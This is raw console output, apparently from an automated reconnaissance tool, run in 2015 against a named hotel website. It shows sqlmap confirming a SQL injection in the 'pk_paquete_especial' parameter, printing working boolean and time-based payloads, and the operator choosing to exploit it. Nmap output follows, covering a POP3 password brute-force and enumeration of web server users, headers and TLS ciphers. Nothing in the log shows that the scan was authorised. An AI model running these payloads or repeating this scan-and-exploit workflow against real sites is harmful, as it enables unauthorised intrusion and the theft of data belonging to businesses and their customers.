  1405. [13:35:42] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
  1406. [13:35:42] [INFO] testing 'MySQL inline queries'
  1407. [13:35:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
  1408. [13:35:42] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
  1409. [13:35:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
  1410. [13:35:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  1411. [13:35:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  1412. [13:35:46] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  1413. [13:35:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  1414. [13:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
  1415. [13:35:48] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
  1416. [13:35:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
  1417. [13:35:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
  1418. [13:36:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
  1419. [13:36:23] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
  1420. [13:36:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
  1421. [13:36:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
  1422. [13:37:28] [INFO] GET parameter 'pk_paquete_especial' seems to be 'MySQL >= 5.0.12 OR time-based blind (comment)' injectable
  1423. [13:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  1424. [13:37:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  1425. [13:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  1426. [13:37:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
  1427. [13:38:18] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
  1428. [13:38:30] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
  1429. [13:38:44] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
  1430. [13:38:53] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
  1431. [13:39:14] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
  1432. [13:39:27] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
  1433. [13:39:52] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
  1434. [13:39:59] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
  1435. [13:40:09] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
  1436. [13:40:09] [INFO] checking if the injection point on GET parameter 'pk_paquete_especial' is a false positive
  1437. GET parameter 'pk_paquete_especial' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  1438. sqlmap identified the following injection point(s) with a total of 351 HTTP(s) requests:
  1439. ---
  1440. Parameter: pk_paquete_especial (GET)
  1441.     Type: boolean-based blind
  1442.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  1443.     Payload: pk_paquete_especial=-3704' OR 4770=4770#&pk_habitacion=
  1444.  
  1445.     Type: AND/OR time-based blind
  1446.     Title: MySQL >= 5.0.12 OR time-based blind (comment)
  1447.     Payload: pk_paquete_especial=73' OR SLEEP(5)#&pk_habitacion=
  1448. ---
  1449. do you want to exploit this SQL injection? [Y/n] Y
  1450. [13:40:18] [INFO] testing MySQL
  1451. [13:40:20] [INFO] confirming MySQL
  1452. [13:40:22] [INFO] the back-end DBMS is MySQL
  1453. [13:40:22] [INFO] actively fingerprinting MySQL
  1454. [13:40:23] [INFO] executing MySQL comment injection fingerprint
  1455. web application technology: Nginx
  1456. back-end DBMS: active fingerprint: MySQL >= 5.5.0
  1457.                html error message fingerprint: MySQL
  1458. [13:40:55] [WARNING] HTTP error codes detected during run:
  1459. 406 (Not Acceptable) - 214 times
  1460. SQL injection vulnerability has already been detected against 'www.lasdunashotel.com'. Do you want to skip further tests involving it? [Y/n] Y
  1461. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
  1462. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=2'
  1463. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=3'
  1464. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=4'
  1465. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=5'
  1466. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=6'
  1467. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=7'
  1468. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=8'
  1469. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=11'
  1470. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=12'
  1471. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=13'
  1472. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=17'
  1473. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=18'
  1474. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=21'
  1475. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=22'
  1476. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=23'
  1477. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
  1478. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=1#Ancla'
  1479. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=2#Ancla'
  1480. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=3#Ancla'
  1481. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=4#Ancla'
  1482. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=5#Ancla'
  1483. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=6#Ancla'
  1484. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=7#Ancla'
  1485. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=8#Ancla'
  1486. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=9#Ancla'
  1487. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=1'
  1488. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
  1489. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion='
  1490. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion='
  1491. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion='
  1492. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion='
  1493. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion='
  1494. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=2'
  1495. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=3'
  1496. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=4'
  1497. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=5'
  1498. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=6'
  1499. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=7'
  1500. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=8'
  1501. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=11'
  1502. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=12'
  1503. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=13'
  1504. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=17'
  1505. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=18'
  1506. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=21'
  1507. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=22'
  1508. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=23'
  1509. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=6'
  1510. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=6'
  1511. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion='
  1512. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion='
  1513. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion='
  1514. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion='
  1515. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion='
  1516. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion='
  1517. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=1'
  1518. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=2'
  1519. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=3'
  1520. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=4'
  1521. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=5'
  1522. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=6'
  1523. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=7'
  1524. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=8'
  1525. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=9'
  1526. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=1'
  1527. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=2'
  1528. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=3'
  1529. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=4'
  1530. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=5'
  1531. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=6'
  1532. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=7'
  1533. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=8'
  1534. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=11'
  1535. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=12'
  1536. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=13'
  1537. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=17'
  1538. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=18'
  1539. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=21'
  1540. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=22'
  1541. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=23'
  1542. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=4'
  1543. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=4'
  1544. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Sol de Ica'
  1545. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente Ay B'
  1546. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente A'
  1547. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente B'
  1548. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Pozo santo'
  1549. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Dunas'
  1550. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion=1'
  1551. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=5'
  1552. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=5'
  1553. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=35&pk_habitacion='
  1554. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=36&pk_habitacion='
  1555. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=9'
  1556. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=9'
  1557. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=8'
  1558. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=8'
  1559. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=1'
  1560. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=2'
  1561. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=2'
  1562. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1#Ancla'
  1563. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2#Ancla'
  1564. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3#Ancla'
  1565. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4#Ancla'
  1566. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5#Ancla'
  1567. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6#Ancla'
  1568. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7#Ancla'
  1569. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8#Ancla'
  1570. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9#Ancla'
  1571. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=1'
  1572. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=3'
  1573. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=3'
  1574. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=7'
  1575. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=7'
  1576. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion='
  1577. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8'
  1578. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=8'
  1579. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion='
  1580. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=3'
  1581. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=4'
  1582. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=5'
  1583. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=6'
  1584. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=39'
  1585. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1'
  1586. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2'
  1587. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3'
  1588. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4'
  1589. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5'
  1590. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6'
  1591. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7'
  1592. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9'
  1593. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Sol de Ica'
  1594. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente Ay B'
  1595. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente A'
  1596. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente B'
  1597. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Pozo santo'
  1598. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Dunas'
  1599. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=9'
  1600. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=6'
  1601. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
  1602. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
  1603. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
  1604. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
  1605. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=3'
  1606. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=4'
  1607. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=5'
  1608. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=6'
  1609. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=39'
  1610. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion=1'
  1611. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=7'
  1612. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=4'
  1613. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=3'
  1614. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Sol de Ica'
  1615. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente Ay B'
  1616. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente A'
  1617. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente B'
  1618. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Pozo santo'
  1619. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Dunas'
  1620. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=7'
  1621. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=9'
  1622. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=5'
  1623. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=2'
  1624. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=3'
  1625. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=4'
  1626. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=5'
  1627. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=6'
  1628. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=8'
  1629. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=2'
  1630. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
  1631. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
  1632. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
  1633. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
  1634. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=3'
  1635. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=4'
  1636. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=5'
  1637. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=6'
  1638. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=39'
  1639. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=35&pk_habitacion=2'
  1640. [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=36&pk_habitacion=2'
  1641. [13:40:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09292015_0133pm.csv'
  1642.  
  1643. [*] shutting down at 13:40:55
  1644.  
  1645. + -- --=[Port 110 opened... running tests...
  1646.  
  1647. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:40 EDT
  1648. Nmap scan report for www.lasdunashotel.com (192.185.26.214)
  1649. Host is up (0.00095s latency).
  1650. rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
  1651. PORT    STATE SERVICE VERSION
  1652. 110/tcp open  pop3    Dovecot pop3d
  1653. | pop3-brute:
  1654. |   Accounts: No valid accounts found
  1655. |_  Statistics: Performed 364 guesses in 617 seconds, average tps: 0
  1656. |_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER CAPA STLS SASL(PLAIN LOGIN) RESP-CODES UIDL TOP
  1657.  
  1658. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1659. Nmap done: 1 IP address (1 host up) scanned in 619.27 seconds
  1660. + -- --=[Port 111 closed... skipping.
  1661. + -- --=[Port 135 closed... skipping.
  1662. + -- --=[Port 139 closed... skipping.
  1663. + -- --=[Port 162 closed... skipping.
  1664. + -- --=[Port 443 opened... running tests...
  1665.  
  1666. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:51 EDT
  1667. NSE: got no answers from pipelined queries
  1668. Nmap scan report for www.lasdunashotel.com (192.185.26.214)
  1669. Host is up (0.022s latency).
  1670. rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
  1671. PORT    STATE SERVICE VERSION
  1672. 443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
  1673. |_http-csrf: Couldn't find any CSRF vulnerabilities.
  1674. |_http-dombased-xss: Couldn't find any DOM based XSS.
  1675. |_http-feed: Couldn't find any feeds.
  1676. |_http-frontpage-login: false
  1677. | http-headers:
  1678. |   Date: Tue, 29 Sep 2015 17:51:34 GMT
  1679. |   Server: Apache
  1680. |   Last-Modified: Sun, 20 Oct 2013 22:07:41 GMT
  1681. |   Accept-Ranges: bytes
  1682. |   Content-Length: 11812
  1683. |   Connection: close
  1684. |   Content-Type: text/html
  1685. |  
  1686. |_  (Request type: HEAD)
  1687. |_http-iis-webdav-vuln: ERROR: This web server is not supported.
  1688. | http-referer-checker:
  1689. | Spidering limited to: maxpagecount=30
  1690. |_  http://code.jquery.com/jquery-1.9.1.js
  1691. |_http-server-header: Apache
  1692. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  1693. | http-useragent-tester:
  1694. |  
  1695. |     Allowed User Agents:
  1696. |     Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)
  1697. |     libwww
  1698. |     lwp-trivial
  1699. |     libcurl-agent/1.0
  1700. |     PHP/
  1701. |     Python-urllib/2.5
  1702. |     GT::WWW
  1703. |     Snoopy
  1704. |     MFC_Tear_Sample
  1705. |     HTTP::Lite
  1706. |     PHPCrawl
  1707. |     URI::Fetch
  1708. |     Zend_Http_Client
  1709. |     http client
  1710. |     PECL::HTTP
  1711. |     Wget/1.13.4 (linux-gnu)
  1712. |     WWW-Mechanize/1.34
  1713. |_  
  1714. |_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
  1715. | ssl-cert: Subject: commonName=*.websitewelcome.com
  1716. | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
  1717. | Public Key type: rsa
  1718. | Public Key bits: 2048
  1719. | Signature Algorithm: sha256WithRSAEncryption
  1720. | Not valid before: 2015-01-05T00:00:00
  1721. | Not valid after:  2018-01-04T23:59:59
  1722. | MD5:   fff8 be59 dc8b d8fa b80b 075b a184 4491
  1723. |_SHA-1: 05da b11f 290a 8e49 9c32 44dc d0b4 b334 e2b4 00f6
  1724. |_ssl-date: 2015-09-29T17:51:29+00:00; -3s from scanner time.
  1725. | ssl-enum-ciphers:
  1726. |   TLSv1.1:
  1727. |     ciphers:
  1728. |       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
  1729. |       TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
  1730. |       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
  1731. |       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
